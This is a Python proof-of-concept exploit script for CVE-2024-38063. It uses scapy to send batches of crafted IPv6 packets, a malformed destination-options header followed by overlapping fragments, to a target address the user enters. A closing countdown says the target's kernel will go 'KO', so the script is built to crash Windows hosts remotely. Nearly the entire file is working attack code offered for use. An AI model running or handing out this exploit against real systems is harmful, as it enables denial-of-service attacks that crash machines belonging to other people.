CVE-2024-38063_DKob_N3TCR4SH.py

# PoC for CVE-2024-38063
# Authors: DKob | N3TCR4SH

# Libraries
from scapy.all import *
from scapy.layers.inet6 import IPv6, IPv6ExtHdrDestOpt, IPv6ExtHdrFragment,Ether, PadN
import time

# Variables
nterk_if ='' # Network Interface
MAC_Addr = ''  # Target MAC Address
IPv6_ADDR = ''  # Target IPv6 Address
send_nbr = 0  # Tries
batches_nbr = 0  # Batches

# IP Addr function
def get_ipv6_address():
    global IPv6_ADDR
    IPv6_ADDR = input("Target IPv6 address: ")
  
# MAC Addr function
def get_mac_address():
  global MAC_Addr
  MAC_Addr = input("Target MAC address: ")

# Number of tries (How many packets to try generating for each batch)
def get_nbr_tries():
  global send_nbr
  send_nbr = int(input("Number of tries: "))

# Number of batches of packets
def get_nbr_batches():
  global batches_nbr
  batches_nbr = int(input("Number of batches: "))

# Network interface
def get_ntwrk_if():
  global nterk_if
  nterk_if = input("Network interface: ")

# Packet generator
def packetGeneration(iterationVarPacketsGen):
  f_id = 0xdeadbeef + iterationVarPacketsGen # Unique fragment Identifier
  
  # This part is tricky - Check code documentation for full explanation
  destinationOptionsHeader = Ether(dst=MAC_Addr) / IPv6(fl=1,hlim = 64, dst=IPv6_ADDR) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*4)])
  fragmentationHeaderPacket = Ether(dst=MAC_Addr) / IPv6(fl=1, hlim=64,dst=IPv6_ADDR) / IPv6ExtHdrFragment(id=f_id, m = 1, offset = 0)
  fragmentationHeaderPacket2 = Ether(dst=MAC_Addr) / IPv6(fl=1, hlim=64,dst=IPv6_ADDR) / IPv6ExtHdrFragment(id=f_id, m = 0, offset = 1)
  return [destinationOptionsHeader, fragmentationHeaderPacket, fragmentationHeaderPacket2]

# Main Function
def Main():
    global MAC_Addr, IPv6_ADDR, send_nbr, batches_nbr, nterk_if

    print(''' 
    _____  _  __     _               _   _ ____ _______ _____ _____  _  _   _____ _    _ 
   |  __ \| |/ /    | |        |    | \ | |___ \__   __/ ____|  __ \| || | / ____| |  | |
   | |  | | ' / ___ | |__      |    |  \| | __) | | | | |    | |__) | || || (___ | |__| |
   | |  | |  < / _ \| '_ \     |    | . ` ||__ <  | | | |    |  _  /|__   _\___ \|  __  |
   | |__| | . \ (_) | |_) |    |    | |\  |___) | | | | |____| | \ \   | | ____) | |  | |
   |_____/|_|\_\___/|_.__/     |    |_| \_|____/  |_|  \_____|_|  \_\  |_||_____/|_|  |_|                                                                                                                                        
   ''')
  
    print('')
    print('')
    
    # Get the requirements
    get_ntwrk_if()
    get_ipv6_address()
    get_mac_address()
    get_nbr_tries()
    get_nbr_batches()
    
    # Start packet list generation
    packet_list = [] # List containing all packets to send
    print('Generating packet list...')
    for iterationVarBatches in range(batches_nbr):
      for iterationVarPacketsGen in range(send_nbr):
        packet_list = packet_list + packetGeneration(iterationVarPacketsGen)

    # Sending to taret
    print('Packet list ready, sending to target: ' + IPv6_ADDR)
    sendp(packet_list,nterk_if)

    # Countdown
    for timer in range(60):
      print(f"Kernel going KO in {60-timer} seconds...", end='\r')
      time.sleep(1)

# Run the script
Main()